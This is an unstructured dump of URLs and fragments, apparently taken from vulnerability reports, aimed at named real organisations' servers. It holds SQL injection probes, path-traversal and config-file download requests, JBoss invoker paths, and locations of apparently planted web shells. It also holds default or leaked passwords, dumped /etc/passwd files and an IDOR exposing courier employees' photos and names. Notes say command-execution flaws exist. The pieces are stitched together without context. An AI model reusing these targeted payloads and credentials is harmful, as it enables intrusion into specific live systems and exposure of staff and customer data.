http://**.**.**.**/personAction!loginInit.action存在命令执行漏洞 http://121.192.177.81:90/NPFC/News_De.asp?id=186 http://192.168.130.13/WEB_VMS/LEVEL15/ http://**.**.**.** http://**.**.**.**/messager/users.data http://oa.baixiangfood.com http://oa.baixiangfood.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://weixin.haidilao.com:8899/hdlwechat/wxMsg/tel.action?mendian=0 http://weixin.haidilao.com:8899/hdlwechat/wxMsg/newMoList.action http://weixin.haidilao.com:8899/hdlwechat/wxMsg/getMO.action?fromid=oKNukjjERVY--a68FPaQuMwKjzmk http://wx.qlogo.cn/mmopen/gwhELYibibFdQ8HNWnrUPnmTLLicb8ibdDx0Rj32qJzSeILyL9tjDxPLMsUHcn5J9TQ4osg99zicTRjBZH8pXMrXYHDCRI2qTYjXm/0 http://www.yzjoa.com http://www.yzjoa.com/messager/users.data http://XX.XX.XX.XX/portal/auth/reg_newuser_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。 http://newoa.xbwl.cn http://newoa.xbwl.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://sms.36060.cn:8989/index.do http://**.**.**.** http://**.**.**.**/messager/users.data http://www.wandacinemas.com/search/search.jsp www.wandacinemas.com http://www.wandacinemas.com http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://gm.uuzu.com/ http://ac.haidilao.com/WS/WebService.asmx/GetFile http://i.xilu.com/index.php?p=space_viewUserInfo\&ownerid=6531955 http://sqlmap.org http://www.51piao.com/Ticket/TicketList.aspx http://www.51piao.com/Ticket/TicketList.aspx http://mapi.mama.cn/v5_3_0/api/mamaquan/mmq_new_reply.php http://**.**.**.**/HotelList.php?pid=103 http://**.**.**.**/default.aspx河南省,陕西省云平台 http://**.**.**.**/login.aspx http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1* http://m.100tal.com:80/ http://XX.XX.XX.XX/wcm/console/auth/reg_newuser_dowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。 http://119.254.70.114/LianJia/?m=ProductList&a=seachProList&orderid=3 http://119.254.70.114/LianJia/xiaoma.php http://oa.qk365.com/ http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/news/new.jsp?id=0000111035 http://fz.evergrande.com/msg.php http://iphone.wochacha.com/ga.php?guid=ON&utmac=MO-1858309-10&utmn=2016505729&utmp=/help%3Fgcsid%3D15cb98e8023c6a845f9999b00e9ed976&utmr=http://iphone.wochacha.com/ https://test.1jiajie.com/system/site/login/ https://testboss.1jiajie.com/system/site/login http://**.**.**.**/BPMSite/login.aspx http://gte.cnoocgas.com:8080/portal/ http://gte.cnoocgas.com:8080/portal/webwarranty/lead_view.jsp?type=l&wid=0000117294 http://zt.a963.com/a963/design/zbdetail.php?id=170 http://www.2177s.com/android/Service.aspx?nType=view&direct=1&pageno=1&srv=recommend http://www.2177s.com/android/Service.aspx?toUser=0&srv=getwebMsgDetail&UserKey=BD64766776B32740B736F28276CC6F0A http://www.2177s.com/android/Service.aspx?userid=40780557&srv=userinfo http://**.**.**.**/ http://**.**.**.**/admincp.php?mod=login http://**.**.**.**/admincp.php?mod=down&path=data/bakup/&file=../../index.php http://**.**.**.**/admincp.php?mod=down&path=data/bakup/&file=../../admincp.php http://121.192.191.146/lims/ http://imcs.ecnu.edu.cn/MAIN/Aboutus.asp?Title=%C3%FB%D3%FE%CB%F9%B3%A4 http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/webfile/out_fw_view.jsp?fwid=FNzaNBUFDaXfTS6nQbkaEjz9qz&title=%E5%85%B3%E4%BA%8E%E5%8F%AC%E5%BC%80%E6%B0%94%E7%94%B5%E9%9B%86%E5%9B%A2%E4%BA%A4%E9%80%9A%E6%96%B0%E8%83%BD%E6%BA%90%E4%BA%8B%E4%B8%9A%E9%83%A82015%E5%B9%B4%E5%B9%B4%E4%B8%AD%E5%B7%A5%E4%BD%9C%E4%BC%9A%E8%AE%AE%E7%9A%84%E9%A2%84%E9%80%9A%E7%9F%A5 http://jiuye.jikexueyuan.com/assistant/apply admin.php/system/updateadmin.html?id=136252 http://jsjy1.dec.ecnu.edu.cn/web/remark/list.asp?id=11&Pageno=1&websortid=7 http://ac.haidilao.com:90/ http://ac.haidilao.com:89/ http://ac.haidilao.com:91/ http://ac.haidilao.com:91/WebServices/WebServiceSSOUser.asmx/GetUserList http://gte.cnoocgas.com:8080/filemanage/ http://gte.cnoocgas.com:8080/filemanage/check_position_count.jsp?userid=admin&password=admin http://gte.cnoocgas.com:8080/filemanage/ http://su8.cn/MemInfo/UsePersonSaveEdit?Cpid=2785 http://su8.cn http://su8.cn/MemInfo/MemCusOrder http://kpi.ecnu.edu.cn https://oneapm.kf5.com/request/new/?_ga=1.230321628.1561433711.1446613755 https://user.oneapm.com/account/profile.do https://oneapm.kf5.com/community/question/id/3276/都存在 https://github.com/jiangguiqiang199/social/blob/427752da424714ce245aa0d8d276cebc7cf58caa/social/social-ModuleParent/socialEmail/src/main/java/com/social/email/utils/email/MailTest.java http://**.**.**.**/?dename=&pages=1&userType=all&thid=&pageNum=10&token=e1599e23890dbe4647e8af422ecbe944&mod=sel_freeScenicList&calls=2&keyword= http://gte.cnoocgas.com:8080/portal http://gte.cnoocgas.com:8080/portal/news/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://gte.cnoocgas.com:8080/portal/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://gte.cnoocgas.com:8080/portal/webstamp/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt http://su8.cn/Forgotpwd/Forgotpwd1 http://su8.cn http://su8.cn/Forgotpwd/Forgotpwd4 http://km.qk365.com/ http://osp.voicecloud.cn/index.php/ajax/qa/outexport?qa_id=125798 http://e-bai.cn/login/login_login.action存在命令执行漏洞 http://e-bai.cn/tst1.jsp密码tom http://www.qianxs.com/mrMoney/mobile/invite/member/queryInvestStatV2.html?mId=MR03010000 http://www.qianxs.com/mrMoney/mobile/invite/member/queryInvestStatV2.html?mId=MR03133445 http://gm.mm.gtarcade.com/ http://hi.haidilao.com/pages/haidl/alter_password.jsp http://111.13.46.70:8020/index.php/Index/Basic/contacts.html http://gte.cnoocgas.com:8080/gfmis/gfmis.war.rar http://gte.cnoocgas.com:8080/gfmis/checkusercodelevel.jsp?verifyCode=6619&userid=admin http://gte.cnoocgas.com:8080/gfmis/ http://gte.cnoocgas.com:8080/gpqhseoa http://gte.cnoocgas.com:8080/gpqhseoa/checkusercodelevel.jsp?userid=admin http://site.hiall.com.cn/www.tar http://site.hiall.com.cn/i.php http://www.swedmp.ecnu.edu.cn www.swedmp.ecnu.edu.cn http://kz.qk365.com/index/cmrepair.do?type=1未授权访问 http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://**.**.**.**/UserLogin http://**.**.**.**/zhtj_webservice_rs/LoginService.asmx?WSDL http://m.hongkongairlines.com/ http://drops.wooyun.org/tips/2078 http://m.hongkongairlines.com/ci/index.php/state/analysis http://lsc.ecnu.edu.cn http://**.**.**.**:80/CHN/About/newsShow.asp?news_id=425%20AND%203*2*1%3d6%20AND%20612%3d612 http://www.aodianyun.com/.svn/entries http://openapi.aodianyun.com/.svn/entries http://pic.aodianyun.com/.svn/entries http://vod.aodianyun.com/.svn/entries http://wx.aodianyun.com/.svn/entries http://**.**.**.** http://**.**.**.**/ascm/index.jsp http://ac.haidilao.com/ http://ac.haidilao.com/DownLoadPage.aspx?FileName=/web.config http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx/GetUserList http://**.**.**.**:80/person/search.action http://**.**.**.**:80/person/search.action http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** www3.ftchinese.com www1.ftchinese.com http://www.srcc.ecnu.edu.cn/NewsType.asp?BigClass=-1 http://my.ikang.com/pay/success?state=1&groupType=0&examId=20000111&connectMis=1&orderId=21051000&packCategory=1 http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059 http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059 http://lxs.ecnu.edu.cn/download.do?id=102&method=download https://153.36.236.94/ http://m.hongkongairlines.com/ https://m.hongkongairlines.com/html_php/cabin/guest_list.php http://**.**.**.**/content.jsp?ID=284 http://**.**.**.**:80/eservices/index-nav.jsp?_menu=menu7 http://59.151.86.7:9200/_search http://101.227.12.143:8080/ http://101.227.12.143:8080/jsp/userAdd.jsp http://101.227.12.143:8080/custom/source/list.jsp/code http://**.**.**.**/index/search/incard/* http://cater.haidilao.com/Cater/app/proxyApp.action?model=1&uri=getuserinfo http://**.**.**.**/news.php?sid=7 http://px.qk365.com/ http://developer.baidu.com http://developer.baidu.com/forum/topic/show?topicId=2856 http://**.**.**.**/php/promanage/orgaction.php?type=2&org=9 http://m.iqianjin.com/user/login?referrer=/user/register http://jy.cdp.edu.cn:8050/Home/regist通过注册点 http://tsg.scujcc.cn/aspx.aspx http://jituan.b2b.cn/category/Category/list?cid=305 http://corp.b2b.cn/category/Category/list?cid=325 http://www.faw.com.cn/uddiexplorer/ http://www.faw.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.7.91.254:80&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://xs.qk365.com/welcome.do http://www.tlqh.com.cn/manager/Login.aspx)处用burp抓一下包,保存一下放入sql里面跑。 http://field.mapbar.com:80/mapbar-fieldwork/pwdfind/pwdfind!main.action存在命令执行漏洞 https://field.mapbar.com/mgisx-framework-login/test.jsp密码tom http://tj.xjsch.com http://px.qk365.com/default.aspx http://px.qk365.com items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:1:expired_unfetched items:1:evicted_unfetched items:7:number items:7:age items:7:evicted items:7:evicted_nonzero items:7:evicted_time items:7:outofmemory items:7:tailrepairs items:7:reclaimed items:7:expired_unfetched items:7:evicted_unfetched items:8:number items:8:age items:8:evicted items:8:evicted_nonzero items:8:evicted_time items:8:outofmemory items:8:tailrepairs items:8:reclaimed items:8:expired_unfetched items:8:evicted_unfetched items:9:number items:9:age items:9:evicted items:9:evicted_nonzero items:9:evicted_time items:9:outofmemory items:9:tailrepairs items:9:reclaimed items:9:expired_unfetched items:9:evicted_unfetched items:10:number items:10:age items:10:evicted items:10:evicted_nonzero items:10:evicted_time items:10:outofmemory items:10:tailrepairs items:10:reclaimed items:10:expired_unfetched items:10:evicted_unfetched items:11:number items:11:age items:11:evicted items:11:evicted_nonzero items:11:evicted_time items:11:outofmemory items:11:tailrepairs items:11:reclaimed items:11:expired_unfetched items:11:evicted_unfetched items:12:number items:12:age items:12:evicted items:12:evicted_nonzero items:12:evicted_time items:12:outofmemory items:12:tailrepairs items:12:reclaimed items:12:expired_unfetched items:12:evicted_unfetched items:13:number items:13:age items:13:evicted items:13:evicted_nonzero items:13:evicted_time items:13:outofmemory items:13:tailrepairs items:13:reclaimed items:13:expired_unfetched items:13:evicted_unfetched items:14:number items:14:age items:14:evicted items:14:evicted_nonzero items:14:evicted_time items:14:outofmemory items:14:tailrepairs items:14:reclaimed items:14:expired_unfetched items:14:evicted_unfetched items:15:number items:15:age items:15:evicted items:15:evicted_nonzero items:15:evicted_time items:15:outofmemory items:15:tailrepairs items:15:reclaimed items:15:expired_unfetched items:15:evicted_unfetched items:16:number items:16:age items:16:evicted items:16:evicted_nonzero items:16:evicted_time items:16:outofmemory items:16:tailrepairs items:16:reclaimed items:16:expired_unfetched items:16:evicted_unfetched items:17:number items:17:age items:17:evicted items:17:evicted_nonzero items:17:evicted_time items:17:outofmemory items:17:tailrepairs items:17:reclaimed items:17:expired_unfetched items:17:evicted_unfetched items:18:number items:18:age items:18:evicted items:18:evicted_nonzero items:18:evicted_time items:18:outofmemory items:18:tailrepairs items:18:reclaimed items:18:expired_unfetched items:18:evicted_unfetched items:19:number items:19:age items:19:evicted items:19:evicted_nonzero items:19:evicted_time items:19:outofmemory items:19:tailrepairs items:19:reclaimed items:19:expired_unfetched items:19:evicted_unfetched items:20:number items:20:age items:20:evicted items:20:evicted_nonzero items:20:evicted_time items:20:outofmemory items:20:tailrepairs items:20:reclaimed items:20:expired_unfetched items:20:evicted_unfetched items:21:number items:21:age items:21:evicted items:21:evicted_nonzero items:21:evicted_time items:21:outofmemory items:21:tailrepairs items:21:reclaimed items:21:expired_unfetched items:21:evicted_unfetched items:22:number items:22:age items:22:evicted items:22:evicted_nonzero items:22:evicted_time items:22:outofmemory items:22:tailrepairs items:22:reclaimed items:22:expired_unfetched items:22:evicted_unfetched items:23:number items:23:age items:23:evicted items:23:evicted_nonzero items:23:evicted_time items:23:outofmemory items:23:tailrepairs items:23:reclaimed items:23:expired_unfetched items:23:evicted_unfetched http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://p.qk365.com/welcome.do http://**.**.**.**/zxDoctorInformation.aspx?ID=20 http://**.**.**.**/webportal/loginSp/userLogin.action http://**.**.**.**/webportal/data.jsp?z0=utf-8 http://**.**.**.**/webportal/wuyun.jsp https://**.**.**.**/wangxuact/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php http://**.**.**.**/ https://github.com/brian6peng/curiosity/blob/76d3a9f68783616a5a7d4b5fb1746a01177c4789/Curiosity/Program.cs http://kz.qk365.com/index/welcome.do http://kz.qk365.com:80/index/cmacc.do?type=0 http://kz.qk365.com:80/index/cmaudit.do?type=0 http://kz.qk365.com:80/index/cmrepair.do?type=0 http://kz.qk365.com:80/index/cmfault.do?type=0 http://www.jiajiao.ecnu.edu.cn/fwzx_details.aspx?id=66 http://www.jiajiao.ecnu.edu.cn/fwzx_details.aspx?id=66 http://**.**.**.**/static_content_view.php?id=14 http://**.**.**.**/ http://www.scient.com.cn/user.php http://kq2.qk365.com http://dk.qk365.com/welcome.do http://dk.qk365.com/welcome.do http://dk.qk365.com/welcome.do http://dk.qk365.com/welcome.do http://dk.qk365.com/301.jsp http://www.xinyidai.cn/invesRecord/invesRecord!findShow?key=e070c3782a5c4851ba18ff13fc76960b&page=1 http://www.xinyidai.cn/invesRecord/invesRecord!findShow?key=e070c3782a5c4851ba18ff13fc76960b*&page=1 http://bd.juhangye.com/wl/userAction!shopping.action存在命令执行漏洞 http://ems.qk365.com/welcome.do https://zc.urtrust.com.cn:9093/casserver/login?service=http%3A%2F%2Fzc.urtrust.com.cn%3A9080%2Fprpall%2Fcommon%2Fpub%2FUIModelCodeQueryInput.jsp%3FComCode%3D9320603 https://zc.urtrust.com.cn:9093/casserver/notes.jsp?systemCode=prpall http://58.211.236.158:8080/infol/login.jsp http://58.211.236.158:8080/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://www.qk365.com/news/elive/infoRight_ajax.do?channelParPagemark=1&hotTopic=1&num=8&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481&titleLen=20 www.qk365.com/news/elive/infoRight_ajaxLink.do?classPagemark=*&num=99&siteid=6ec601fd-69a0-4469-a6f7-d1edb7136481 http://www.appstar.com.cn http://**.**.**.**/dwbm_bminfoshow.do?bmid=1 http://**.**.**.**/dwbm_bminfoshow.do?bmid=900 http://**.**.**.**/dwbm_bminfoshow.do?bmid=400 http://**.**.**.**/dwbm_bminfoshow.do?bmid=9854【9000多个人员】 http://**.**.**.**/dwbm_bminfoshow.do?bmid=3600 http://**.**.**.**/dwbm_bminfoshow.do?bmid=61091【六万多数据呀】 http://**.**.**.**/dwbm_bminfoshow.do?bmid=550 http://**.**.**.**/dwbm_bminfoshow.do?bmid=37000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=5000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=67000 http://**.**.**.**/index.shtml http://**.**.**.**/dwbm_bminfoshow.do?bmid=3000 http://**.**.**.**/dwbm_bminfoshow.do?bmid=90000 http://oa.juran.com.cn:8086/invoker/JMXInvokerServlet http://material.mediav.com/compile/m2/.svn/entries http://hr.qk365.com/home http://login.italk24.com/createorder!createOrder.action http://**.**.**.**/default/contents/content/i/* http://kq2.qk365.com/login http://bx.qk365.com:51106/ http://bx.qk365.com:51106/index/cmacc.do?type=0 http://jzcg.faw.com.cn/home.jsp Name:WIN-CAGAHJRCDME Version:Windows Description:Microsoft http://218.2 system:type=ServerInfo http://218.2 system:type=ServerInfo jdbc:oracle:thin:@localhost:1521:orcl http://**.**.**.**:85/Default.aspx# http://oa.qk365.com http://**.**.**.**/managers/logon.action存在命令执行漏洞 http://**.**.**.**/jcms/bfdh_qh.jsp http://service2.winic.org/Service.asmx?op=GET_MSP_MO http://oa2.qk365.com/web.rar https://github.com/xiaomincui/100allin https://github.com/xiaomincui/100allin/blob/master/web.config https://github.com/xiaomincui/100allin/blob/25c7294440612e2d5cdbe924b33e59ea88b01c39/admin/usercontrols/adminleft.ascx.cs https://github.com/xiaomincui/100allin/blob/master/bbsmessage/login.aspx.cs http://**.**.**.**:8050/Upload/Unit/YYZZ/aspx.aspx http://**.**.**.**:89/login.do http://**.**.**.**/bugs/wooyun-2015-0135000 http://**.**.**.**:89/verifyLogin.do?clienttype=Webclient&clientver=4.5&country=&language=&loginid=sysadmin'and'1'%3D'1&password=s4&verify= http://**.**.**.**:89/verifyLogin.do?clienttype=Webclient&clientver=4.5&country=&language=&loginid=sysadmin'and'1'%3D'2&password=s4&verify= http://client.wochacha.com/price/list?gcsid=b162bfa72dee4c3a286122259162b65f&id=1350082&query=%E8%8B%8F%E8%8F%B2&reid=494 http://**.**.**.**/Login/Login.aspx?Logout=true https://mail.tujia.com/ pass:Www.tujia.com http://**.**.**.** http://qun.jikexueyuan.com/javaweb?page_count=10&type=1&subject=38 http://www.nuomi.com/uc/order/ http://**.**.**.**/user/login.action?method=check存在命令执行漏洞 http://**.**.**.**/test.jsp密码tom http://**.**.**.**:7788/szinfo/Login_indexPage http://**.**.**.**:7788/szinfo/authority/saleSysRoleAction!listRole?user_id=LIYK35&uuid=15218963F227405B90707B4A77EEE3B50000&applySysId=Prepay http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a'or'1'='1 http://cos.sto.cn/messager/MsgTemp.jsp?loginid=a'or'1'='2 http://wooyun.org/bugs/wooyun-2015-0150482 http://qun.jikexueyuan.com/ http://qun.jikexueyuan.com/wiki/topic/22#editorBox http://www.laoyouka.com:80/flow.php?step=add_to_cart goods_id:359,number:2,parent:0,quick:1,spec:[*],yijian:1 http://**.**.**.**/edoas2/oa.jsp http://**.**.**.**/epstar/login/mixLogin.jsp http://**.**.**.**/epstar/servlet/RaqFileServer?action=save&fileName=/../test.jsp http://exs.qk365.com/welcome.do?loginResult= http://digi.m.aili.com/index.php?c=wap&m=column&channel=1 http://fashion.m.aili.com/index.php?c=wap&m=column&channel=1 http://beauty.m.aili.com/index.php?c=wap&m=column&channel=1 http://health.m.aili.com/index.php?c=wap&m=column&channel=1 http://baby.m.aili.com/index.php?c=wap&m=column&channel=1 http://men.m.aili.com/index.php?c=wap&m=column&channel=1 http://auto.m.aili.com/index.php?c=wap&m=column&channel=1 http://lifestyle.m.aili.com/index.php?c=wap&m=column&channel=1 http://play.m.aili.com/index.php?c=wap&m=column&channel=1 http://www.3ajinrong.com/market/lend/bidsbid root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin www:x:500:500::/alidata/www:/sbin/nologin mysql:x:501:501::/home/mysql:/sbin/nologin http://**.**.**.**/manage/Login.asp http://**.**.**.**/index.action?request_locale=zh_TW dir:/opt/EnterprisePlatform-4.3.0.GA_CP05/jboss-as/server/production/./tmp/deploy/tmp8005383656729047945FrontEnd-exp.war/ http://www.doctorpda.cn/about/us# http://www.med330.cn/ti.action存在命令执行漏洞 http://m.sh2.daoyoudao.com/ http://**.**.**.**/login?server=134403&url=http://**.**.**.**/index.action&context=&root=1&auth=a27709 http://tj.qk365.com/welcome.do dir:/usr/local/webapps/BossStat/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin w3master:x:500:500::/home/w3master:/bin/bash nginx:x:501:501::/home/nginx:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin cacti:x:503:503::/home/cacti:/bin/bash mysql:x:504:504::/home/mysql:/sbin/nologin http://dj.qk365.com/PartyBuilding/welcome.do http://dj.qk365.com/PartyBuilding/welcome.do http://kz.qk365.com/index/index/index/login.do http://61.190.20.51/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1 http://v2ex.com/t/233645看到风先生的帖子 http://**.**.**.**/news/news_detail.php?id=28320 http://pm.qk365.com/welcome.do dir:/usr/local/webapps/ProjMgr/ http://news.sciencenet.cn/html/newscomm.aspx?nid=331093 http://**.**.**.**/security/login.jsp http://www.ecsuntrade.com/index/index_execute.html,链接地址http://www.ecsuntrade.com/index/footer/footer!about.action存在命令执行漏洞 www.faw3s.com/Member/MemberArea.aspx?ID=60 http://114.255.72.176/ipcc/login/logout.action http://114.255.72.176/ipcc/login/logout.action mysql:admin/admin) http://**.**.**.**/index.php/Index/page_content/kind/10/viewid/4/id/1346* http://**.**.**.**/EpointBigFileUpLoad/BigFileUpLoadStorage/bfe9b4d2-af7b-4691-925d-f7621ac36247/oracle%E8%B4%A6%E5%8F%B7.txt http://**.**.**.**/auth/login http://www.crvole.com.cn/ http://vip.crvole.com.cn/account/verifyEmail?email=1 http://180.166.182.60/login.jsp http://113.16.174.130:8080/manage/logon.jsp http://113.16.174.130:8080/manage/cms/attachment_old.jsp http://113.16.174.130:8080/manage/cms/attachment.jsp http://113.16.174.130:8080/manage/cms/attachment_apache.jsp http://113.16.174.130:8080/manage/cms/attachment_apache.jsp http://**.**.**.**/fgwjsp/gywm.jsp?channelid=535 http://daili.b2b.cn/Index!showIndex.action http://113.16.174.130:8080/manage/Library/userlist.jsp http://113.16.174.130:8080/tyzx/public/userlist.jsp http://113.16.174.130:8080/manage/usermanage/finduser.jsp?username=sysadmin http://113.16.174.130:8080/manage/usermanage/modifyuser.jsp?f=0.11192052964728694 http://acm.cs.ecnu.edu.cn/bbsread.php?id=3018&set=1 http://www.yjszs.ecnu.edu.cn www.yjszs.ecnu.edu.cn https://open.zhongan.com/open/login/resetPassWord.htm?resultCode=1 http://wj.haidilao.com http://**.**.**.**/bugs/wooyun-2010-0134808 http://**.**.**.**/visitor/getPwdPhone.action http://**.**.**.**/upload//banner/images/2015/11/06/8464bedef46f44bb987893cc6689cf3e.php http://**.**.**.**/upload//banner/images/2015/11/06/6fd636cbfb7440e5b0ae0bcdd1c9526b.jsp http://www.51piao.com/Flight/FlightSale.aspx?Flag=2 http://www.51piao.com/Flight/FlightSale.aspx?Flag=2 http://**.**.**.**:9080 http://**.**.**.**:9080/xx.jsp http://**.**.**.**/Med_Insurance/hospitalList.aspx http://www.qinzhu.ecnu.edu.cn/ www.qinzhu.ecnu.edu.cn https://**.**.**.**/webui/Home.action存在命令执行漏洞 http://**.**.**.**/Exclusive.asp?id=-1 http://store.sf-express.com/emp/pic/614713.jpg(数字部分为顺丰工号,可以任意下载查看,如果用迅雷批量下载,可以得到所有人的头像,根据头像可以再划分有无分配的工号,可以逆向查找姓名和手机,此漏洞要是给相亲网站拿去了,会是咋样啊) http://i.sf-express.com/weiwap/showempinfo.html?empno=896599(任意修改后面工号可以得到所有员工的头像和姓名) http://i.sf-express.com/service/store/storeorder/employeeinfo?empCode=896599 http://i.sf-express.com/service/store/storeorder/employeeinfo?empCode=000001 http://smartvideo.youku.com/ https://github.com/xiaosongbk/AutoTest/blob/478419bf8c733b275a0d91840a2d67515055fa7a/newpiston_menu.py http://android.myapp.com/myapp/detail.htm?apkName=com.zhongan.insurance http://www.scude.cc/webpage/news.jsp?id=21143&na=%D1%A7%D4%BA%D0%C2%CE%C5&type=0 http://**.**.**.**/sms/sendsms http://**.**.**.**/sms.asmx?WSDL http://**.**.**.**/ http://**.**.**.**/login.aspx http://wooyun.org/bugs/wooyun-2015-0142693 http://blog.163.com/liwei1987821@126/blog/static/17266492820121092544348/ http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'and'1'='1&vtype=m3u8 http://app.m.letv.com/android/mindex.phtml?version=3.3.0.1&pcode=010110106&mod=minfo&ctl=video&act=index&id=80103'and'1'='2&vtype=m3u8 http://mail.nesc.cn http://fc09.etwealth.com http://n.gy-center.net:8080/login.action存在命令执行漏洞 http://webcache.googleusercontent.com/search?q=cache:E0FZlVur7YMJ:222.76.214.15/bank.sql+&cd=1&hl=zh-CN&ct=clnk&gl=jp http://**.**.**.**/lisms/action/loginAction.do?loginfre=loginfre http://jira.wecash.net/login.jsp https://github.com/shangES/ses/blob/a0bf0b736b95cdb00f091ffd7d970231dc0ab691/WebContent/WEB-INF/classes/application.properties http://dulife.baidu.com/device/1621 http://**.**.**.**/zongwu/ http://**.**.**.**/bfst/admin/db.inc.php?gateway=hfdydar2 http://**.**.**.**/web_manage/index.php http://**.**.**.**/uploadfile/upload/2011082203560054.php?gateway=hfdydar2 http://**.**.**.**/index22.php?gateway=hfdtdar2 http://**.**.**.**/data/log/miniUpload.php http://**.**.**.**/lzjs/2011-12-06/38.php?gateway=hfdydar2 http://**.**.**.**/userInfoEdit.jsp http://**.**.**.**/zongwu/biaozhun/baoxiu/articleviewsql.php?id=37 http://**.**.**.**/zongwu/biaozhun/mydecms/login.php http://**.**.**.**/zongwu/zwc/suguan/new/admin/login.php http://**.**.**.**/zongwu/sdnzx/admincp.php 